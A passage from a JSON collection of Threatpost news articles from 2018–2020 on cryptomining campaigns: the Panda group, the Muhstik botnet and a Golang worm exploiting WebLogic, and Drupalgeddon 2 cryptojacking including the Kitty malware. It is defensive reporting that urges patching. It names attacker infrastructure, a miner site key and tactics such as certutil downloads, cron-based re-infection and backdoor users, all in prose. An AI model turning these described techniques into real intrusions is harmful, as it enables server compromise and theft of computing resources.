year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and leveraging an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that it\u2019s initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, very little of its TTPs [tactics, techniques and procures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. \u201cTheir infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don\u2019t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.\u201d\n\nBetween swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining \u2013 and moving forward, Panda remains an active threat that system administers should be wary of.\n\n\u201cThere are several ways to detect mining activity but let\u2019s focus on the simple solutions of patching and basic security controls,\u201d Evans told Threatpost. \u201cIf you\u2019re running a web-accessible WebLogic server that has hasn\u2019t been patched against vulnerabilities like CVE-2017-10271, it\u2019s likely they have at least targeted the system for exploitation if not actually dropped a miner on it\u2026 In addition, if you don\u2019t need it open to the Internet, take it off.\u201d\n\n_**Interested in the role of artificial intelligence in cybersecurity, for both offense and defense? Don\u2019t miss our free **_[_**Threatpost webinar**_](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)_**, AI and Cybersecurity: Tools, Strategy and Advice, with senior editor Tara Seals and a panel of experts. **__**[Click here to register.](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)**_\n", "cvss3": {}, "published": "2019-09-17T21:04:35", "type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:46", "description": "UPDATE\n\nA variant of the Muhstik botnet has been uncovered in the wild, exploiting a recently-disclosed, dangerous vulnerability in Oracle WebLogic servers.\n\nThe newfound samples of Muhstik are targeting the [recently-patched CVE-2019-2725](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) in WebLogic servers, and then launching distributed-denial-of-service (DDoS) and cryptojacking attacks with the aim of making money for the attacker behind the botnet, researchers said.\n\n\u201cFrom the timeline, we can see that the developer of Muhstik watches aggressively for new Linux service vulnerability exploits and takes immediate action to [incorporate] exploits against them into the botnet,\u201d Cong Zheng and Yanhui Jia, researchers with Palo Alto Network\u2019s Unit 42 team, said in a [Tuesday analysis](<https://unit42.paloaltonetworks.com/muhstik-botnet-exploits-the-latest-weblogic-vulnerability-for-cryptomining-and-ddos-attacks/>). \u201cThis makes sense, because the faster the botnet includes the new exploits, the greater chance of successfully using the vulnerability to harvest more bots before systems are patched.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOracle WebLogic is a popular server used for building and deploying enterprise applications. The server\u2019s flaw ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)), meanwhile, has a CVSS score of 9.8 and is a remote code-execution (RCE) bug that is exploitable without authentication. Oracle patched the flaw on April 26.\n\nHowever, researchers first observed exploit traffic for the WebLogic vulnerability coming from three new Muhstik samples on April 28. Muhstik, which has been around since March 2018 and has wormlike self-propagating capabilities, is known to compromise Linux servers and IoT devices, and then launch cryptocurrency mining software and DDoS attacks.\n\nThey saw the exploit traffic being sent from the IP address 165.227.78[.]159, which was transmitting one shell command, to download a PHP webshell.\n\nInterestingly, that IP address (165.227.78[.]159) has previously been used by the Muhstik botnet as a mere reporting server to collect information on bots \u2013 but now, the IP address appears to also be used as a payload host server.\n\nThe discovery shows that new samples of the Muhstik botnet continue to sniff out ripe exploits. The botnet had previously targeted an earlier WebLogic vulnerability ([CVE-2017-10271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271>)), as well as WordPress and [Drupal vulnerabilities.](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)\n\nUnit 42 researchers told Threatpost that they didn\u2019t have further information on the number of servers impacted.\n\n## Oracle WebLogic\n\nThe latest Oracle WebLogic flaw, which impacts versions 10.3.6 and 12.1.3 of the server, is one such ripe target.\n\nThe flaw could allow an attacker to send a request to a WebLogic server, which would then reach out to a malicious host to complete the request, opening up the impacted server to an remote code-execution attack.\n\nOracle for its part is urging users to update as soon as possible. \u201cDue to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible,\u201d Eric Maurice, director of security assurance at Oracle, said in a [recent post](<https://blogs.oracle.com/security/security-alert-cve-2019-2725-released>) about the vulnerability.\n\nOracle didn\u2019t respond to a request for further comment from Threatpost.\n\nHowever, servers that haven\u2019t yet updated are being targeted by several other bad actors, including ones spreading a new [ransomware variant](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) uncovered this week called \u201cSodinokibi.\u201d That ransomware first came onto researchers\u2019 radar on April 25 (the day before a patch was released), after attackers attempted to make an HTTP connection with vulnerable Oracle WebLogic servers.\n\nResearchers for their part warn of a slew of scans checking for the Oracle WebLogic vulnerability, and urge users to update their devices as soon as possible.\n\nhttps://twitter.com/bad_packets/status/1122356384849248258\n\nWhen it comes to Muhstik, Unit 42 researchers said that adding this latest exploit to the botnet\u2019s toolkit will increase the number of systems it can infect.\n\n\u201cThe Oracle WebLogic wls9-async RCE vulnerability is now being used by Muhstik botnet in the wild and there is a great possibility that it will be exploited by other malware families in the future,\u201d they said. \u201cUnder the pressure of racing with botnets, both service vendors and users should address new vulnerabilities by releasing patches and installing them respectively.\u201d\n\n_This article was updated on May 2 at 8 am ET to reflect Unit 42 comments._\n", "cvss3": {}, "published": "2019-05-01T14:11:11", "type": "threatpost", "title": "Muhstik Botnet Variant Targets Just-Patched Oracle WebLogic Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-2725", "CVE-2020-0688"], "modified": "2019-05-01T14:11:11", "id": "THREATPOST:420EE567E806D93092741D7BB375AC57", "href": "https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:23:27", "description": "A new version of a known malware campaign aimed at installing cryptominers has changed up its tactics, adding attacks on Windows servers and a new pool of exploits to its bag of tricks. It is also swiftly evolving to position itself as a backdoor for downloading future, more damaging malware, researchers said.\n\nThe malware itself was first uncovered about a year ago, and is a loader that spreads as a worm, searching and infecting other vulnerable machines. Once it infects a machine, it fetches the XMRig cryptomining payload, which mines for Monero.\n\nAccording to [an analysis](<https://blog.barracuda.com/2020/06/25/threat-spotlight-new-cryptominer-malware-variant/>) from Barracuda Networks released Thursday, the heretofore unnamed loader, which it now calls \u201cGolang,\u201d originally targeted only Linux machines, but now has spread to Windows and other servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis new malware variant attacks web application frameworks, application servers and non-HTTP services such as Redis and MSSQL,\u201d explained the researchers. They added, \u201cWhile the volume is still low because the variant is so new, Barracuda researchers have seen only seven source IP addresses linked to this malware variant so far, and they are all based in China.\u201d\n\nThe bad code also uses various older vulnerability exploits in order to achieve the initial compromise of a targeted machine. The new version includes: CVE-2017-10271 for Oracle WebLogic; CVE-2015-1427 and CVE-2014-3120 for ElasticSearch; [CVE-2018-7600 for Drupal](<https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/>), a.k.a. \u201c[Drupalgeddon 2.0](<https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/>)\u201c; and CVE-2018-20062 for the ThinkPHP framework.\n\nOther exploits that don\u2019t have CVEs are also used to exploit Hadoop, Redis and MSSQL. In the latter two cases, the malware will first try to mount a dictionary/brute-forcing attack to find credentials, and, if successful, it will use a known method for achieving remote code-execution \u201cby dumping the db file into cron path,\u201d according to Barracuda.\n\n\u201cSome of the exploits the malware includes are targeting the ThinkPHP web application framework, which is popular in China,\u201d according to the report. \u201cAs in other families of malwares, it is safe to assume that this malware will keep evolving, employing more and more exploits.\u201d\n\n## **A Golang Malware**\n\nNotably, the malware is written in the Go language (Golang).\n\nGolang is a 10-year-old compiled programming language designed by Google. According to F5 Networks, [which discovered](<https://www.f5.com/labs/articles/threat-intelligence/new-golang-malware-is-spreading-via-multiple-exploits-to-mine-mo>) the first iteration of the malware last summer, applications written in Go tend to be bulkier than others as the functions imported from other libraries are compiled in the binary itself. It also has a unique way of calling functions and storing symbols and data.\n\n\u201cAlthough the language is about 10 years old, and is used by many legitimate programmers, there has not been as much activity with Golang malware,\u201d according to F5. That said, in April, another wormable Golang loader known as Kinsing [was spotted](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) dropping XMRig onto Docker instances.\n\n## **Under the Hood**\n\nOnce the malware infects a machine, it downloads a set of files that are customized based on the platform it is attacking. One of those files positions the malware for doing more damage than simply installing a cryptominer.\n\nThe file sets typically include the initial loader pacyload, an update script, a cryptominer and its configuration file, a watchdog, a scanner and a config file for the cryptominer, Barracuda noted.\n\nOut of these files, the watchdog makes sure that the scanner and miner are up and running and that all components are up to date.\n\n\u201cIf it fails to connect to the command-and-control server (C2), it will try to fetch the address of a new server by parsing transactions on a specific Ethereum account,\u201d explained the researchers.\n\nThe scanner file meanwhile is the malware\u2019s worm propagation mechanism. It automatically scans the internet for vulnerable machines by generating random IP addresses and trying to attack the machines behind them. Once it infects a target, it reports back to the C2 about the success.\n\nFor Windows machines, the malware also adds a backdoor user, researchers found \u2013 essentially just adding another user to the system. An init/update script accomplishes this on the Linux side, according to the analysis, by adding authorized SSH key to the system.\n\n\u201cAlthough the malware includes components which constantly check for updates and help persist the attack, the installed backdoor user grants another level of control to the operators,\u201d Erez Turjeman, senior software engineer and a security researcher for Barracuda Labs, told Theatpost. \u201cThis can be used for deploying additional attacks on the victim\u2019s machine and network, beyond the scope of cryptomining.\u201d\n\nHe added, \u201cThe cryptomining component in this malware can be easily replaced by the operators into some other functionality, meaning that we might see other variants used for other purposes in the future.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-25T18:30:59", "type": "threatpost", "title": "Golang Worm Widens Scope to Windows, Adds Payload Capacity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-7600", "CVE-2020-5135"], "modified": "2020-06-25T18:30:59", "id": "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "href": "https://threatpost.com/worm-golang-malware-windows-payloads/156924/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T07:11:44", "description": "Hackers have been stealing CPU-cycles from visitors to the Make-A-Wish Foundation\u2019s international website in order to mine for Monero cryptocurrency. Researchers said they found the CoinIMP mining script embedded in the non-profit\u2019s website, and that it was taking advantage of the Drupalgeddon 2 vulnerability.\n\nTrustwave researchers discovered the cryptominer on the Make-A-Wish International\u2019s [website](<https://worldwish.org/en>) and said it had been active since May. Make-A-Wish International is the global arm of the US-based Make-A-Wish Foundation.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/11/19094554/make-a-wish-.png>)\n\n\u201cEmbedded in the site was a script using the computing power of visitors to the site to mine cryptocurrency into the cybercriminals\u2019 pockets, making their \u2018wish\u2019 to be rich, come \u2018true,'\u201d said Simon Kenin, security researcher with Trustwave in a Monday [post](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Hacker-s-Wish-Come-True-After-Infecting-Visitors-of-Make-A-Wish-Website-With-Cryptojacking/?page=1&year=0&month=0&LangType=1033>) outlining the discovery. \u201cIt\u2019s a shame when criminals target anyone but targeting a charity just before the holiday season? That\u2019s low.\u201d\n\nThe CoinIMP miner is JavaScript based and is often used by unsavory individuals who secretly embed the code into websites and use it to mine Monero currency on a site visitor\u2019s phone, tablet or computer.\n\nAccording to Kenin, the attack leveraged an unpatched instance of the Drupal online publishing platform and the [Drupalgeddon 2 vulnerability,](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>) patched in March.\n\n\u201cA quick investigation showed that the domain \u2018drupalupdates.tk\u2019 that was used to host the mining script is part of a known campaign which has been exploiting Drupalgeddon 2 in the wild since May 2018,\u201d said Kenin.\n\nWhile a patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available for months, many sites have not updated and remain vulnerable. As of June, in fact, more than More than 115,000 sites were still [vulnerable](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>).\n\nThis cryptojacking campaign was particularly difficult to find because it used different techniques to avoid static detections. For instance, it starts with changing the domain name that hosts the JavaScript miner (which is itself obfuscated). Then, the WebSocket proxy also used different domains and IPs to avoid blacklist solutions, according to Trustwave.\n\nKenin said he reached out to the Make-A-Wish organization, but didn\u2019t hear back \u2013 however, the injected script has since been removed from the site.\n\n\u201cWe are aware that the Make-A-Wish International Worldwish.org website was impacted by a vulnerability, which has been removed and remedied,\u201d A Make-A-Wish spokesperson told Threatpost. \u201cNo Make-A-Wish International donor or constituent data was compromised by this incident. Make-A-Wish International is redoubling its efforts to maintain website security against third-party threats.\u201d\n\nIn the meantime, Kenin warned that Drupal-based websites need to be updated or risk malicious exploits such as Drupalgeddon 2.\n\n\u201cDrupalgeddon 2 is not the only attack vector that cyber criminals use to infect sites with cryptojacking malware,\u201d he said. \u201cThe cryptojacking phenomenon is so widely spread that it is sometimes hard to tell whether a website is infected with malware or the mining code was genuinely added by the site owner. This is especially true of smaller sites, who might use cryptomining in a legitimate source of income but whose ability to secure their website might also be limited putting them at risk of cryptojacking compromise.\u201d\n", "cvss3": {}, "published": "2018-11-19T16:20:59", "type": "threatpost", "title": "Cryptojacking Attack Targets Make-A-Wish Foundation Website", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-11-19T16:20:59", "id": "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "href": "https://threatpost.com/cryptojacking-attack-targets-make-a-wish-foundation-website/139194/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T05:52:31", "description": "More than 115,000 sites are still vulnerable to a highly critical Drupal bug \u2013 even though a patch was released three months ago.\n\nWhen it was first revealed, the bug, which has been dubbed Drupalgeddon 2.0, impacted an estimated 1+ million sites running Drupal \u2013 including major U.S. educational institutions and government organizations around the world. According to researcher Troy Mursch, up to 115,070 sites are still vulnerable, including websites of a large television network, a mass media and entertainment conglomerate and two \u201cwell-known computer hardware manufacturers.\u201d\n\nA patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available since March. Drupalgeddon 2.0 \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin.\n\nMursch said he located almost 500,000 sites using Drupal 7 (the most widely used version) using the source-code search engine PublicWWW. Any site using at least version 7.58 was not considered vulnerable, as Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are impacted (along with the Drupal 6 and 8.3.x and 8.4.x releases, according to Drupal).\n\n> I've shared the list of 115,070 vulnerable Drupal sites with [@USCERT_gov](<https://twitter.com/USCERT_gov?ref_src=twsrc%5Etfw>) and [@drupalsecurity](<https://twitter.com/drupalsecurity?ref_src=twsrc%5Etfw>). Due to the highly critical risk of CVE-2018-7600 being exploited, the list won't be shared publicly.\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003922275094052864?ref_src=twsrc%5Etfw>)\n\nOf those sites, more than 115,000 were vulnerable, said Mursch, but it may be more: He said he could not ascertain the versions used for 225,056 of the sites. Around 134,447 sites were not vulnerable.\n\nMursch told Threatpost he has passed along the list of impacted sites to CERTs and other government organizations for help notifying them.\n\nMeanwhile, while the researcher was scanning for vulnerable sites, he also found yet another new cryptojacking campaign targeting Drupal websites.\n\nThe campaign, which uses the domain name upgraderservices[.]cf to inject Coinhive, impacts over 250 websites, including a police department\u2019s website in Belgium and the Colorado Attorney General\u2019s office.\n\nCoinhive is a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive\u2019s JavaScript miner software is often used by hackers, who sneakily embed the code into websites and then mine Monero currency by tapping the CPU processing power of unwitting site visitors\u2019 phones, tablets and computers.\n\n> I've been monitoring the latest [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign using upgraderservices[.]cf to inject [#Coinhive](<https://twitter.com/hashtag/Coinhive?src=hash&ref_src=twsrc%5Etfw>) on vulnerable Drupal websites. The list of affected sites has been added to the spreadsheet.<https://t.co/ukZux5aSuM>\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003864551346003968?ref_src=twsrc%5Etfw>)\n\nMursch said the US-CERT has been notified of the active campaign.\n\nThe cryptomining campaign is only the most recent one to take advantage of the headache that is the Drupal glitch. Earlier in [May](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>), researchers at Imperva Incapsula found a cryptomining malware dubbed \u201ckitty\u201d targeting servers and browsers open to Drupalgeddon 2.0. Also, a [botnet ](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)dubbed Muhstik installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cThis latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale,\u201d Mursch said. \u201cIf you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-06-05T18:24:29", "type": "threatpost", "title": "Drupalgeddon 2.0 Still Haunting 115K+ Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-05T18:24:29", "id": "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "href": "https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:00", "description": "**UPDATE** \u2013 Hundreds of websites running on the Drupal content management system \u2013 including those of the San Diego Zoo and the National Labor Relations Board \u2013 have been targeted by a malicious cryptomining campaign taking advantage of unpatched and recently revealed vulnerabilities.\n\nThe attacks, which have impacted over 400 government and university websites worldwide, leverage the critical remote-code execution vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) dubbed Drupalgeddon 2.0, said Troy Mursch, researcher with Bad Packets Report. The Drupal bug in questions has been patched for over a month now.\n\n\u201cAfter the scan completed, the full scope of this cryptojacking campaign was established,\u201d Mursch wrote in a [report posted Saturday](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>). \u201cUsing the bulk scan feature of urlscan.io, it became clear these were all sites were running outdated and vulnerable versions of Drupal content management system.\u201d\n\n> This [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) outbreak started at the zoo and quickly spread to 400+ other sites. <https://t.co/SNRtysBcsi>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 7, 2018](<https://twitter.com/bad_packets/status/993519523826290688?ref_src=twsrc%5Etfw>)\n\nAs of Tuesday evening, Mursch said he has found more websites that were targeted by the attack, including that of Lenovo, UCLA, and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (a US federal government agency).\n\n> Sheet has been updated with additional sites. It's not an exhaustive list and is subject to change as this [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign is still ongoing. <https://t.co/AwO2oe1znp>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 8, 2018](<https://twitter.com/bad_packets/status/993644561476894721?ref_src=twsrc%5Etfw>)\n\nThe cryptominer in question was made by Coinhive, a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive\u2019s JavaScript miner software is often used by hackers, who secretly embed the code into websites and then mine Monero currency by tapping the CPU processing power of site visitors\u2019 phones, tablets and computers.\n\n\u201cDigging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method,\u201d Mursch wrote. \u201cThe malicious code was contained in the \u2018/misc/jquery.once.js?v=1.2\u2019 JavaScript library.\u201d\n\nMursch said he was notified by one of his Twitter followers soon after of additional compromised sites using a different payload \u2013 however, all the infected sites pointed to the same domain using the same Coinhive site key. Coinhive\u2019s site key is code linked to a unique cryptographic key that delegates who keeps the cryptocurrency that is being mined.\n\nThat domain used to inject the malware was vuuwd[.]com, according to Mursch. \u201cOnce the code was deobfuscated, the reference to \u2018http://vuuwd[.]com/t.js\u2019 was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.\u201d\n\nThe site key used, meanwhile, was \u201cKNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.\u201d Mursch said he confirmed the key was still active by checking in Fiddler.\n\nMursch said that the miner was only slightly throttled so that it had a reduced impact on visitors\u2019 CPUs and would be harder to detect.\n\nTypically, cryptojacking attacks are not throttled and use 100 percent of the target\u2019s CPU. As a result victims can sometimes experience overheating of their phone or computer as their device gets bogged down by an over-taxed processor.\n\nWhen trying to nail down the owner of vuuwd[.]com, Mursch came across fake data from WHOIS indicating that \u201cit belongs to \u2018X XYZ\u2019 who lives on \u2018joker joker\u2019 street in China,\u201d he explained in a Tweet. However, the email address that was used (goodluck610@foxmail.com) provided a small hint as it was associated with other registered domains.\n\n> While the clearly fake WHOIS data may seem like a dead end, the same email address (goodluck610@foxmail.com) was used to register five other domains. It's likely you'd find malicious activity tied to these as well. One of the domains references less-fake information. [pic.twitter.com/IEeqXrAKTT](<https://t.co/IEeqXrAKTT>)\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 4, 2018](<https://twitter.com/bad_packets/status/992539059485528065?ref_src=twsrc%5Etfw>)\n\nThe domain name vuuwd[.]com was also used previously in Monero mining operations through mineXMR[.]com, said Mursch: \u201cWhile it\u2019s somewhat unusual they\u2019d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made,\u201d he said.\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6,7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits, botnets and cryptomining malware have cropped up \u2013 including a recent attack, leveraging the \u201cKitty\u201d [cryptomining](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>) malware, which cashed in on the vulnerable Drupal websites.\n\nBeyond the Kitty malware, researchers have found a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cWe\u2019ve seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks,\u201d said Mursch in the report. \u201cThis is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-05-07T16:16:20", "type": "threatpost", "title": "Cryptojacking Campaign Exploits Drupal Bug, Over 400 Websites Attacked", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-07T16:16:20", "id": "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "href": "https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-04-25T05:50:00", "description": "Yet another bad actor has taken advantage of Drupal sites still vulnerable to \u201cDrupalgeddon 2.0,\u201d this time to mine cryptocurrency.\n\nThe bad script, dubbed the \u201cKitty\u201d cryptomining malware, takes advantage of the known critical remote-code execution vulnerability in Drupal ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) to target not only servers but also browsers, according to researchers at security company Imperva Incapsula.\n\nOn servers, the attackers install a mining program \u2013 \u201ckkworker\u201d \u2013 which mines the xmrig (XMR) Monero cryptocurrency.\n\nBut the attackers are are also looking to expand their mining efforts to web app visitors using a mining script called me0w.js. They achieve this through adding the malicious JavasSript (me0w.js) to the commonly used index.php file, cashing in on the processor juice of future visitors to the infected web server site.\n\n\u201cTo win over kitty lovers\u2019 hearts, the attacker cheekily asks to leave his malware alone by printing \u2018me0w, don\u2019t delete pls i am a harmless cute little kitty, me0w,'\u201d the researchers said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120202/kitty-31.png>)\n\nTo make it all happen, the actors behind Kitty have used an open-source mining software for browsers called \u201cwebminerpool\u201d to first write a bash script \u2013 in the form of a PHP file called kdrupal.php \u2013 on a server disc.\n\n\u201cIn doing so, the attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability,\u201d according to Imperva\u2019s [report](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120017/kitty-1.png>)\n\nResearchers said that while the PHP backdoor is \u201cfairly light and simple,\u201d it has some tricks up its sleeve, including using the sha512 hash function to protect the attacker\u2019s remote authentication.\n\nOnce this backdoor has been established, a time-based job scheduler is registered to periodically re-download and execute a bash script from remote hosts every minute. This means the attackers can easily re-infect the server and quickly push updates to the infected servers under their control.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120100/kitty-2.png>)\n\nResearchers said the Monero address used in Kitty has been spotted before in April, in attacks targeting web servers running the vBulletin 4.2.X CMS.\n\nInterestingly, it appears the attacker has updated the malware version after every change in its code, according to the report.\n\n\u201cThe first generation of the \u2018Kitty malware\u2019 we discovered was version 1.5, and the latest version is 1.6,\u201d said the researchers. \u201cThis type of behavior can be an indication of an organized attacker, developing their malware like a software product, fixing bugs and releasing new features in cycles.\u201d\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6,7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits have cropped up taking advantage of it.\n\nThat includes a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n", "cvss3": {}, "published": "2018-05-03T16:57:19", "type": "threatpost", "title": "Kitty Cryptomining Malware Cashes in on Drupalgeddon 2.0", "bulletinFamily": "info", "cvss2": 